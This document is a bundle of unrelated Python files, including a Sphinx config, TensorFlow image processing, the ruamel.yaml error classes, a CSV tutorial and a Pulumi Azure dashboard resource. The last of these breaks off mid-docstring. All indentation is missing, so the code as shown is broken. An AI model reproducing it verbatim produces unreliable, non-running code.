# The name of the Pygments (syntax highlighting) style to use.
pygments_style = "sphinx"
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output -------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = "sphinx_rtd_theme"
# Theme options are theme-specific and customize the look and feel of a
# theme further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ["_static"]
# -- Options for HTMLHelp output ---------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = "daggerdoc"
# -- Options for LaTeX output ------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass
# [howto, manual, or own class]).
latex_documents = [
(master_doc, "dagger.tex", u"dagger Documentation", u"David Siklosi", "manual")
]
# -- Options for manual page output ------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [(master_doc, "dagger", u"dagger Documentation", [author], 1)]
# -- Options for Texinfo output ----------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(
master_doc,
"dagger",
u"dagger Documentation",
author,
"dagger",
"One line description of project.",
"Miscellaneous",
)
]
|
# -*- coding: utf-8 -*-
"""
Convert README file from Markdown to text
"""
from markdown import markdown
import html2text # from `aaronsw` :(
MARKER = 'MARKER()()MARKER'
def fix_quotes(mdcontent):
count = 0
quote_state = False
quote_char = '`'
quote_string = ''
new_string = ''
quotes = []
for char in mdcontent:
is_quote = char == quote_char
if quote_state and not is_quote:
quote_string += char
if is_quote:
count += 1
else:
count = 0
if not quote_state:
new_string += char
if count == 3:
if quote_state:
new_string += MARKER
quotes.append(quote_string.split('\n')[1:])
# for line in quote_string.split('\n')[1:]:
# if line.strip() != '':
# print("LINE *%s*" % line)
# new_string += '\t' + line + '\n'
quote_state = False
else:
quote_state = True
quote_string = ''
return new_string, quotes
def fix_text(marked_text, quotes):
new_string = ''
quotes = quotes[::-1]
for piece in marked_text.split(MARKER):
new_string += piece
try:
quote = quotes.pop()
except IndexError:
pass
else:
for line in quote:
if line.strip() != '':
# print("LINE *%s*" % line)
new_string += '\t' + line + '\n'
return new_string
def convert_markdown_file(input_file):
# input_file = 'README.md'
output_file = input_file.split('.')[0]
with open(input_file, 'r') as rhandler:
# markdown
mdcontent = rhandler.read()
marked_content, quotes = fix_quotes(mdcontent)
# HTML
html = markdown(marked_content)
# text
marked_text = html2text.html2text(html)
text = fix_text(marked_text, quotes)
with open(output_file, 'w') as whandler:
whandler.write(text)
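# Example invocation (assumes a README.md sits next to this script; the output path is
# derived by stripping the extension, as convert_markdown_file() does above):
#
#   convert_markdown_file('README.md')   # writes the plain-text version to 'README'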
|
def split_caps(key):
""" splits a string using capital letters as separator
e.g. split_caps('ExampleString') returns ['Example', 'String']
"""
b = False
lst = []
x = 0
for i, ch in enumerate(key):
if i > 0 and ch.isupper():
temp = key[x:i]
if b and not temp.isupper():
lst.append(key[x:i-1])
x = i-1
b = True
elif b:
lst.append(key[x:i-1])
b = False
x = i-1
lst.append(key[x:])
return lst
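# Usage example taken from the docstring above (illustrative only):
#
#   split_caps('ExampleString')   # -> ['Example', 'String']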
|
# coding=utf-8
# Copyright 2022 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Forward processing of raw data to sRGB images.
Unprocessing Images for Learned Raw Denoising
http://timothybrooks.com/tech/unprocessing
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow.compat.v1 as tf
def apply_gains(bayer_images, red_gains, blue_gains):
"""Applies white balance gains to a batch of Bayer images."""
bayer_images.shape.assert_is_compatible_with((None, None, None, 4))
green_gains = tf.ones_like(red_gains)
gains = tf.stack([red_gains, green_gains, green_gains, blue_gains], axis=-1)
gains = gains[:, tf.newaxis, tf.newaxis, :]
return bayer_images * gains
def demosaic(bayer_images):
"""Bilinearly demosaics a batch of RGGB Bayer images."""
bayer_images.shape.assert_is_compatible_with((None, None, None, 4))
# This implementation exploits how edges are aligned when upsampling with
# tf.image.resize_bilinear().
with tf.name_scope(None, 'demosaic'):
shape = tf.shape(bayer_images)
shape = [shape[1] * 2, shape[2] * 2]
red = bayer_images[Ellipsis, 0:1]
red = tf.image.resize_bilinear(red, shape)
green_red = bayer_images[Ellipsis, 1:2]
green_red = tf.image.flip_left_right(green_red)
green_red = tf.image.resize_bilinear(green_red, shape)
green_red = tf.image.flip_left_right(green_red)
green_red = tf.space_to_depth(green_red, 2)
green_blue = bayer_images[Ellipsis, 2:3]
green_blue = tf.image.flip_up_down(green_blue)
green_blue = tf.image.resize_bilinear(green_blue, shape)
green_blue = tf.image.flip_up_down(green_blue)
green_blue = tf.space_to_depth(green_blue, 2)
green_at_red = (green_red[Ellipsis, 0] + green_blue[Ellipsis, 0]) / 2
green_at_green_red = green_red[Ellipsis, 1]
green_at_green_blue = green_blue[Ellipsis, 2]
green_at_blue = (green_red[Ellipsis, 3] + green_blue[Ellipsis, 3]) / 2
green_planes = [
green_at_red, green_at_green_red, green_at_green_blue, green_at_blue
]
green = tf.depth_to_space(tf.stack(green_planes, axis=-1), 2)
blue = bayer_images[Ellipsis, 3:4]
blue = tf.image.flip_up_down(tf.image.flip_left_right(blue))
blue = tf.image.resize_bilinear(blue, shape)
blue = tf.image.flip_up_down(tf.image.flip_left_right(blue))
rgb_images = tf.concat([red, green, blue], axis=-1)
return rgb_images
def apply_ccms(images, ccms):
"""Applies color correction matrices."""
images.shape.assert_has_rank(4)
images = images[:, :, :, tf.newaxis, :]
ccms = ccms[:, tf.newaxis, tf.newaxis, :, :]
return tf.reduce_sum(images * ccms, axis=-1)
def gamma_compression(images, gamma=2.2):
"""Converts from linear to gamma space."""
# Clamps to prevent numerical instability of gradients near zero.
return tf.maximum(images, 1e-8) ** (1.0 / gamma)
def process(bayer_images, red_gains, blue_gains, cam2rgbs):
"""Processes a batch of Bayer RGGB images into sRGB images."""
bayer_images.shape.assert_is_compatible_with((None, None, None, 4))
with tf.name_scope(None, 'process'):
# White balance.
bayer_images = apply_gains(bayer_images, red_gains, blue_gains)
# Demosaic.
bayer_images = tf.clip_by_value(bayer_images, 0.0, 1.0)
images = demosaic(bayer_images)
# Color correction.
images = apply_ccms(images, cam2rgbs)
# Gamma compression.
images = tf.clip_by_value(images, 0.0, 1.0)
images = gamma_compression(images)
return images
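# Illustrative usage sketch (assumes the TF1-compat import above; the shapes, gains and
# the identity color matrix are placeholders, not values taken from the paper):
#
#   bayer = tf.random_uniform([1, 64, 64, 4])               # packed RGGB planes in [0, 1]
#   red_gains = tf.constant([2.0])
#   blue_gains = tf.constant([1.5])
#   cam2rgbs = tf.eye(3, batch_shape=[1])                   # identity CCM
#   srgb = process(bayer, red_gains, blue_gains, cam2rgbs)  # -> [1, 128, 128, 3]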
|
from uuid import UUID
import dao.user_dao as dao
from api import db
from utils.common import PlutoException
class InvalidUserException(PlutoException):
pass
def create_user(username: str, user_attributes):
uuid = UUID(user_attributes.get('sub', None))
existing_user = dao.find_user(uuid)
if existing_user is not None:
return existing_user
email = user_attributes.get('email', None)
name = user_attributes.get('name', None)
if username and email:
user = dao.create_user(uuid, username, email, name)
db.session.commit()
return user
raise InvalidUserException("Username or email not defined")
|
"""Creates New Test Command."""
from ..commands import BaseScaffoldCommand
class TestCommand(BaseScaffoldCommand):
"""
Creates a new test case.
test
{name : Name of the test you would like to create}
"""
scaffold_name = "Test"
postfix = ""
prefix = "Test"
template = "/masonite/snippets/scaffold/test"
base_directory = "tests/test_"
file_to_lower = True
|
import sqlite3
from .db import DB
class CounsellingInfoTable(DB):
def __init__(self):
self.table_name = 'WB_counselling'
self.table_desc = 'West Bengal ambulance and tele-counselling information'
self.cols = self.getcolumns()
def getcolumns(self):
cols = {
'date': 'DATE NOT NULL PRIMARY KEY',
'general_queries_24h': 'INT',
'general_queries_cum': 'INT',
'consultations_24h': 'INT',
'consultations_total': 'INT',
'ambulances_assigned_24h': 'INT',
'ambulance_calls_24h': 'INT',
'telepsych_counselling_24h': 'INT',
'telepsych_counselling_total': 'INT'
}
return cols
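# A hypothetical helper (an addition, not part of the original DB base class)
# showing how the column mapping above could be rendered into SQL; the real
# base class may already provide an equivalent method.
def build_create_table_sql(table):
    """Builds a CREATE TABLE statement from a table object's name and columns."""
    column_defs = ', '.join(
        '{} {}'.format(name, ctype) for name, ctype in table.cols.items())
    return 'CREATE TABLE IF NOT EXISTS {} ({})'.format(
        table.table_name, column_defs)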
|
# Data Preprocessing Tools for Data Cleaning
# Import libraries
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
# Importing the dataset
dataset = pd.read_csv('')  # TODO: point this at the dataset CSV file
X = dataset.iloc[:, :-1].values
y = dataset.iloc[:, -1].values
print(X)
print(y)
# Taking care of missing data
from sklearn.impute import SimpleImputer
imputer = SimpleImputer(missing_values=np.nan, strategy='mean')
imputer.fit(X[:, 1:3])
X[:, 1:3] = imputer.transform(X[:, 1:3])
print(X)
# Encoding categorical data
# Encoding the Independent Variable
from sklearn.compose import ColumnTransformer
from sklearn.preprocessing import OneHotEncoder
ct = ColumnTransformer(transformers=[('encoder', OneHotEncoder(), [0])], remainder='passthrough')
X = np.array(ct.fit_transform(X))
print(X)
# Encoding the Dependent Variable
from sklearn.preprocessing import LabelEncoder
le = LabelEncoder()
y = le.fit_transform(y)
print(y)
# Splitting the dataset into the Training set and Test set
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = 1)
print(X_train)
print(X_test)
print(y_train)
print(y_test)
# Feature Scaling
from sklearn.preprocessing import StandardScaler
sc = StandardScaler()
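# Only the remaining numeric columns are standardized below; the leading columns
# are the one-hot dummies produced by the ColumnTransformer above (assumed here
# to be three for the categorical feature, hence the 3: slice) and are left as-is.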
X_train[:, 3:] = sc.fit_transform(X_train[:, 3:])
X_test[:, 3:] = sc.transform(X_test[:, 3:])
print(X_train)
print(X_test)
|
from distutils.core import setup
from catkin_pkg.python_setup import generate_distutils_setup
d = generate_distutils_setup()
d['packages'] = ['resource_retriever']
d['scripts'] = []
d['package_dir'] = {'': 'src'}
setup(**d)
|
# coding: utf-8
from __future__ import absolute_import
import warnings
import textwrap
from ruamel.yaml.compat import utf8
if False: # MYPY
from typing import Any, Dict, Optional, List, Text # NOQA
__all__ = [
'FileMark', 'StringMark', 'CommentMark', 'YAMLError', 'MarkedYAMLError',
'ReusedAnchorWarning', 'UnsafeLoaderWarning', 'MarkedYAMLWarning',
'MarkedYAMLFutureWarning',
]
class StreamMark(object):
__slots__ = 'name', 'index', 'line', 'column',
def __init__(self, name, index, line, column):
# type: (Any, int, int, int) -> None
self.name = name
self.index = index
self.line = line
self.column = column
def __str__(self):
# type: () -> Any
where = " in \"%s\", line %d, column %d" \
% (self.name, self.line + 1, self.column + 1)
return where
class FileMark(StreamMark):
__slots__ = ()
class StringMark(StreamMark):
__slots__ = 'name', 'index', 'line', 'column', 'buffer', 'pointer',
def __init__(self, name, index, line, column, buffer, pointer):
# type: (Any, int, int, int, Any, Any) -> None
StreamMark.__init__(self, name, index, line, column)
self.buffer = buffer
self.pointer = pointer
def get_snippet(self, indent=4, max_length=75):
# type: (int, int) -> Any
if self.buffer is None: # always False
return None
head = ''
start = self.pointer
while (start > 0 and
self.buffer[start - 1] not in u'\0\r\n\x85\u2028\u2029'):
start -= 1
if self.pointer - start > max_length / 2 - 1:
head = ' ... '
start += 5
break
tail = ''
end = self.pointer
while (end < len(self.buffer) and
self.buffer[end] not in u'\0\r\n\x85\u2028\u2029'):
end += 1
if end - self.pointer > max_length / 2 - 1:
tail = ' ... '
end -= 5
break
snippet = utf8(self.buffer[start:end])
        caret = '^ (line: {})'.format(self.line + 1)
return ' ' * indent + head + snippet + tail + '\n' \
+ ' ' * (indent + self.pointer - start + len(head)) + caret
def __str__(self):
# type: () -> Any
snippet = self.get_snippet()
where = " in \"%s\", line %d, column %d" \
% (self.name, self.line + 1, self.column + 1)
if snippet is not None:
where += ":\n" + snippet
return where
class CommentMark(object):
__slots__ = 'column',
def __init__(self, column):
# type: (Any) -> None
self.column = column
class YAMLError(Exception):
pass
class MarkedYAMLError(YAMLError):
def __init__(self, context=None, context_mark=None,
problem=None, problem_mark=None, note=None, warn=None):
# type: (Any, Any, Any, Any, Any, Any) -> None
self.context = context
self.context_mark = context_mark
self.problem = problem
self.problem_mark = problem_mark
self.note = note
# warn is ignored
def __str__(self):
# type: () -> Any
lines = [] # type: List[str]
if self.context is not None:
lines.append(self.context)
if self.context_mark is not None \
and (self.problem is None or self.problem_mark is None or
self.context_mark.name != self.problem_mark.name or
self.context_mark.line != self.problem_mark.line or
self.context_mark.column != self.problem_mark.column):
lines.append(str(self.context_mark))
if self.problem is not None:
lines.append(self.problem)
if self.problem_mark is not None:
lines.append(str(self.problem_mark))
if self.note is not None and self.note:
note = textwrap.dedent(self.note) # type: ignore
lines.append(note)
return '\n'.join(lines)
class YAMLStreamError(Exception):
pass
class YAMLWarning(Warning):
pass
class MarkedYAMLWarning(YAMLWarning):
def __init__(self, context=None, context_mark=None,
problem=None, problem_mark=None, note=None, warn=None):
# type: (Any, Any, Any, Any, Any, Any) -> None
self.context = context
self.context_mark = context_mark
self.problem = problem
self.problem_mark = problem_mark
self.note = note
self.warn = warn
def __str__(self):
# type: () -> Any
lines = [] # type: List[str]
if self.context is not None:
lines.append(self.context)
if self.context_mark is not None \
and (self.problem is None or self.problem_mark is None or
self.context_mark.name != self.problem_mark.name or
self.context_mark.line != self.problem_mark.line or
self.context_mark.column != self.problem_mark.column):
lines.append(str(self.context_mark))
if self.problem is not None:
lines.append(self.problem)
if self.problem_mark is not None:
lines.append(str(self.problem_mark))
if self.note is not None and self.note:
note = textwrap.dedent(self.note) # type: ignore
lines.append(note)
if self.warn is not None and self.warn:
warn = textwrap.dedent(self.warn) # type: ignore
lines.append(warn)
return '\n'.join(lines)
class ReusedAnchorWarning(YAMLWarning):
pass
class UnsafeLoaderWarning(YAMLWarning):
text = """
The default 'Loader' for 'load(stream)' without further arguments can be unsafe.
Use 'load(stream, Loader=ruamel.yaml.Loader)' explicitly if that is OK.
Alternatively include the following in your code:
import warnings
warnings.simplefilter('ignore', ruamel.yaml.error.UnsafeLoaderWarning)
In most other cases you should consider using 'safe_load(stream)'"""
pass
warnings.simplefilter('once', UnsafeLoaderWarning)
class MantissaNoDotYAML1_1Warning(YAMLWarning):
def __init__(self, node, flt_str):
# type: (Any, Any) -> None
self.node = node
self.flt = flt_str
def __str__(self):
# type: () -> Any
line = self.node.start_mark.line
col = self.node.start_mark.column
return """
In YAML 1.1 floating point values should have a dot ('.') in their mantissa.
See the Floating-Point Language-Independent Type for YAML™ Version 1.1 specification
( http://yaml.org/type/float.html ). This dot is not required for JSON nor for YAML 1.2
Correct your float: "{}" on line: {}, column: {}
or alternatively include the following in your code:
import warnings
warnings.simplefilter('ignore', ruamel.yaml.error.MantissaNoDotYAML1_1Warning)
""".format(self.flt, line, col)
warnings.simplefilter('once', MantissaNoDotYAML1_1Warning)
class YAMLFutureWarning(Warning):
pass
class MarkedYAMLFutureWarning(YAMLFutureWarning):
def __init__(self, context=None, context_mark=None,
problem=None, problem_mark=None, note=None, warn=None):
# type: (Any, Any, Any, Any, Any, Any) -> None
self.context = context
self.context_mark = context_mark
self.problem = problem
self.problem_mark = problem_mark
self.note = note
self.warn = warn
def __str__(self):
# type: () -> Any
lines = [] # type: List[str]
if self.context is not None:
lines.append(self.context)
if self.context_mark is not None \
and (self.problem is None or self.problem_mark is None or
self.context_mark.name != self.problem_mark.name or
self.context_mark.line != self.problem_mark.line or
self.context_mark.column != self.problem_mark.column):
lines.append(str(self.context_mark))
if self.problem is not None:
lines.append(self.problem)
if self.problem_mark is not None:
lines.append(str(self.problem_mark))
if self.note is not None and self.note:
note = textwrap.dedent(self.note) # type: ignore
lines.append(note)
if self.warn is not None and self.warn:
warn = textwrap.dedent(self.warn) # type: ignore
lines.append(warn)
return '\n'.join(lines)
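# A minimal usage sketch (an addition, not part of the original module): builds
# a MarkedYAMLError by hand to show how context/problem marks are rendered. The
# stream name, coordinates and messages are illustrative only.
if __name__ == '__main__':
    _buf = 'key: [1, 2\n'
    _mark = StringMark('<example>', len(_buf) - 1, 0, len(_buf) - 1, _buf, len(_buf) - 1)
    _err = MarkedYAMLError(
        context='while parsing a flow sequence',
        context_mark=_mark,
        problem="expected ',' or ']', but got end of stream",
        problem_mark=_mark,
    )
    print(str(_err))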
|
from tezos_private_node_connectivity_checker import application
if __name__ == "__main__":
application.run()
|
import re
import mistune
from fluffy.app import app
from fluffy.component.highlighting import guess_lexer
from fluffy.component.highlighting import PygmentsHighlighter
class HtmlCommentsInlineLexerMixin:
"""Strip HTML comments inside lines."""
def enable_html_comments(self):
self.rules.html_comment = re.compile(
'^<!--(.*?)-->',
)
self.default_rules.insert(0, 'html_comment')
def output_html_comment(self, m):
return ''
class HtmlCommentsBlockLexerMixin:
"""Strip blocks which consist entirely of HTML comments."""
def enable_html_comments(self):
self.rules.html_comment = re.compile(
'^<!--(.*?)-->',
)
self.default_rules.insert(0, 'html_comment')
def parse_html_comment(self, m):
pass
class CodeRendererMixin:
"""Render highlighted code."""
def block_code(self, code, lang):
return PygmentsHighlighter(
guess_lexer(code, lang, None, opts={'stripnl': True}),
).highlight(code)
class FluffyMarkdownRenderer(
CodeRendererMixin,
mistune.Renderer,
):
pass
class FluffyMarkdownInlineLexer(
mistune.InlineLexer,
HtmlCommentsInlineLexerMixin,
):
pass
class FluffyMarkdownBlockLexer(
mistune.BlockLexer,
HtmlCommentsBlockLexerMixin,
):
pass
_renderer = FluffyMarkdownRenderer(
escape=True,
hard_wrap=False,
)
_inline = FluffyMarkdownInlineLexer(_renderer)
_inline.enable_html_comments()
_block = FluffyMarkdownBlockLexer(mistune.BlockGrammar())
_block.enable_html_comments()
@app.template_filter()
def markdown(text):
return mistune.Markdown(
renderer=_renderer,
inline=_inline,
block=_block,
)(text)
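# A small usage sketch (an addition, not part of the original module): the
# template filter can also be called directly as a plain function; the HTML
# comment below should be stripped by the mixins defined above.
if __name__ == '__main__':
    print(markdown('# Hello\n\n<!-- this comment is stripped -->\n\nSome `code`.'))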
|
"""
Comma Separated Values - CSV (Valores separados por vírgula)
É um formato de dados muito usado em tabelas (Excel, Google Sheets), bases de
dados, clientes de e-mail, etc...
"""
import csv
with open('clientes.csv', 'r') as arquivo:
dados = [x for x in csv.DictReader(arquivo)]
with open('cliente2.csv', 'w', newline='') as arquivo:
    escreve = csv.writer(
        arquivo,
        delimiter=',',
        quotechar='"',  # wrap every field in double quotes
        quoting=csv.QUOTE_ALL  # quote all fields
    )
chaves = dados[0].keys()
chaves = list(chaves)
escreve.writerow(
[
chaves[0],
chaves[1],
chaves[2],
chaves[3]
]
)
for dado in dados:
        escreve.writerow(  # write one row per client
[
dado['Nome'],
dado['Sobrenome'],
dado['E-mail'],
dado['Telefone']
]
)
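# An equivalent, more idiomatic variant (an addition, not part of the original
# lesson): csv.DictWriter writes the header and the rows straight from the list
# of dicts. The output filename 'cliente3.csv' is just an illustrative choice.
with open('cliente3.csv', 'w', newline='') as arquivo:
    escritor = csv.DictWriter(
        arquivo,
        fieldnames=['Nome', 'Sobrenome', 'E-mail', 'Telefone'],
        quoting=csv.QUOTE_ALL,
        extrasaction='ignore',  # skip any extra columns the source file may have
    )
    escritor.writeheader()
    escritor.writerows(dados)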
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['DashboardArgs', 'Dashboard']
@pulumi.input_type
class DashboardArgs:
def __init__(__self__, *,
resource_group_name: pulumi.Input[str],
dashboard_properties: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
"""
The set of arguments for constructing a Dashboard resource.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which to
create the dashboard.
:param pulumi.Input[str] dashboard_properties: JSON data representing dashboard body. See above for details on how to obtain this from the Portal.
:param pulumi.Input[str] location: Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
        :param pulumi.Input[str] name: Specifies the name of the Shared Dashboard. This should be 64 chars max, only alphanumeric and hyphens (no spaces). For a more friendly display name, add the `hidden-title` tag.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
"""
pulumi.set(__self__, "resource_group_name", resource_group_name)
if dashboard_properties is not None:
pulumi.set(__self__, "dashboard_properties", dashboard_properties)
if location is not None:
pulumi.set(__self__, "location", location)
if name is not None:
pulumi.set(__self__, "name", name)
if tags is not None:
pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the resource group in which to
create the dashboard.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="dashboardProperties")
def dashboard_properties(self) -> Optional[pulumi.Input[str]]:
"""
JSON data representing dashboard body. See above for details on how to obtain this from the Portal.
"""
return pulumi.get(self, "dashboard_properties")
@dashboard_properties.setter
def dashboard_properties(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "dashboard_properties", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
        Specifies the name of the Shared Dashboard. This should be 64 chars max, only alphanumeric and hyphens (no spaces). For a more friendly display name, add the `hidden-title` tag.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A mapping of tags to assign to the resource.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@pulumi.input_type
class _DashboardState:
def __init__(__self__, *,
dashboard_properties: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
"""
Input properties used for looking up and filtering Dashboard resources.
:param pulumi.Input[str] dashboard_properties: JSON data representing dashboard body. See above for details on how to obtain this from the Portal.
:param pulumi.Input[str] location: Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
        :param pulumi.Input[str] name: Specifies the name of the Shared Dashboard. This should be 64 chars max, only alphanumeric and hyphens (no spaces). For a more friendly display name, add the `hidden-title` tag.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which to
create the dashboard.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
"""
if dashboard_properties is not None:
pulumi.set(__self__, "dashboard_properties", dashboard_properties)
if location is not None:
pulumi.set(__self__, "location", location)
if name is not None:
pulumi.set(__self__, "name", name)
if resource_group_name is not None:
pulumi.set(__self__, "resource_group_name", resource_group_name)
if tags is not None:
pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter(name="dashboardProperties")
def dashboard_properties(self) -> Optional[pulumi.Input[str]]:
"""
JSON data representing dashboard body. See above for details on how to obtain this from the Portal.
"""
return pulumi.get(self, "dashboard_properties")
@dashboard_properties.setter
def dashboard_properties(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "dashboard_properties", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
        Specifies the name of the Shared Dashboard. This should be 64 chars max, only alphanumeric and hyphens (no spaces). For a more friendly display name, add the `hidden-title` tag.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the resource group in which to
create the dashboard.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A mapping of tags to assign to the resource.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
class Dashboard(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
dashboard_properties: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
__props__=None):
"""
Manages a shared dashboard in the Azure Portal.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
config = pulumi.Config()
md_content = config.get("mdContent")
if md_content is None:
md_content = "# Hello all :)"
video_link = config.get("videoLink")
if video_link is None:
video_link = "https://www.youtube.com/watch?v=......"
current = azure.core.get_subscription()
my_group = azure.core.ResourceGroup("my-group", location="West Europe")
my_board = azure.dashboard.Dashboard("my-board",
resource_group_name=my_group.name,
location=my_group.location,
tags={
"source": "managed",
},
dashboard_properties=f\"\"\"{{
"lenses": {{
"0": {{
"order": 0,
"parts": {{
"0": {{
"position": {{
"x": 0,
"y": 0,
"rowSpan": 2,
"colSpan": 3
}},
"metadata": {{
"inputs": [],
"type": "Extension/HubsExtension/PartType/MarkdownPart",
"settings": {{
"content": {{
"settings": {{
"content": "{md_content}",
"subtitle": "",
"title": ""
}}
}}
}}
}}
}},
"1": {{
"position": {{
"x": 5,
"y": 0,
"rowSpan": 4,
"colSpan": 6
}},
"metadata": {{
"inputs": [],
"type": "Extension/HubsExtension/PartType/VideoPart",
"settings": {{
"content": {{
"settings": {{
"title": "Important Information",
"subtitle": "",
"src": "{video_link}",
"autoplay": true
}}
}}
}}
}}
}},
"2": {{
"position": {{
"x": 0,
"y": 4,
"rowSpan": 4,
"colSpan": 6
}},
"metadata": {{
"inputs": [
{{
"name": "ComponentId",
"value": "/subscriptions/{current.subscription_id}/resourceGroups/myRG/providers/microsoft.insights/components/myWebApp"
}}
],
"type": "Extension/AppInsightsExtension/PartType/AppMapGalPt",
"settings": {{}},
"asset": {{
"idInputName": "ComponentId",
"type": "ApplicationInsights"
}}
}}
}}
}}
}}
}},
"metadata": {{
"model": {{
"timeRange": {{
"value": {{
"relative": {{
"duration": 24,
"timeUnit": 1
}}
}},
"type": "MsPortalFx.Composition.Configuration.ValueTypes.TimeRange"
}},
"filterLocale": {{
"value": "en-us"
}},
"filters": {{
"value": {{
"MsPortalFx_TimeRange": {{
"model": {{
"format": "utc",
"granularity": "auto",
"relative": "24h"
}},
"displayCache": {{
"name": "UTC Time",
"value": "Past 24 hours"
}},
"filteredPartIds": [
"StartboardPart-UnboundPart-ae44fef5-76b8-46b0-86f0-2b3f47bad1c7"
]
}}
}}
}}
}}
}}
}}
\"\"\")
```
It is recommended to follow the steps outlined
        [here](https://docs.microsoft.com/en-us/azure/azure-portal/azure-portal-dashboards-create-programmatically#fetch-the-json-representation-of-the-dashboard) to create a Dashboard in the Portal and extract the relevant JSON to use in this resource. From the extracted JSON, the contents of the `properties: {}` object can be used. Variables can be injected as needed - see above example.
## Import
Dashboards can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:dashboard/dashboard:Dashboard my-board /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/rg1/providers/Microsoft.Portal/dashboards/00000000-0000-0000-0000-000000000000
```
Note the URI in the above sample can be found using the Resource Explorer tool in the Azure Portal.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] dashboard_properties: JSON data representing dashboard body. See above for details on how to obtain this from the Portal.
:param pulumi.Input[str] location: Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
